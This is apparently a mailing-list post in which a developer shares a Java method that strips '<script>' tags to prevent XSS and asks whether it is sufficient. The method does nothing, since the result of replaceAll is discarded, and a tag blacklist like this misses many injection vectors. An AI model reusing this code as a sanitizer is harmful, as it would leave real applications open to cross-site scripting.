Hi All,
In our application, recently we figured out that there are some XSS (Cross
site scripting) vulnerabilities. First I was thinking of using HTML encoding
mechanism to overcome this issue. But then I figured out that we need to
display HTML tags since, we allow the users to save text formatting.
I just wrote a small function to overcome XSS, this only removes <script>
tags from the string.
Here's the code
public static String removeScriptTags(String string)
{
if (string == null)
{
throw new NullPointerException(
"String sent to remove script tags method is
null");
}
// make sure that the all letters are in the lower case without
actually
// converting the
// original string to lower case
String tmp = new String(string);
tmp = tmp.toLowerCase();
if (tmp.contains("<script>"))
{
int scriptIndex = tmp.indexOf("<script>");
String script = string.substring(scriptIndex, scriptIndex
+ 8);
string.replaceAll(script, " ");
}
if (tmp.contains("</script>"))
{
int scriptIndex = tmp.indexOf("</script>");
String script = string.substring(scriptIndex, scriptIndex
+ 9);
string.replaceAll(script, " ");
}
return string;
}
Can you please let me know whether above code is sufficient or is there a
built in option in Glassfish Server to over come this.
Best Regards.
Lasitha
*******************************************************************************************************************************************************************
"The information contained in this email including in any attachment is confidential and is meant to be read only by the person to whom it is addressed. If you are not the intended recipient(s), you are prohibited from printing, forwarding, saving or copying this email. If you have received this e-mail in error, please immediately notify the sender and delete this e-mail and its attachments from your computer."
*******************************************************************************************************************************************************************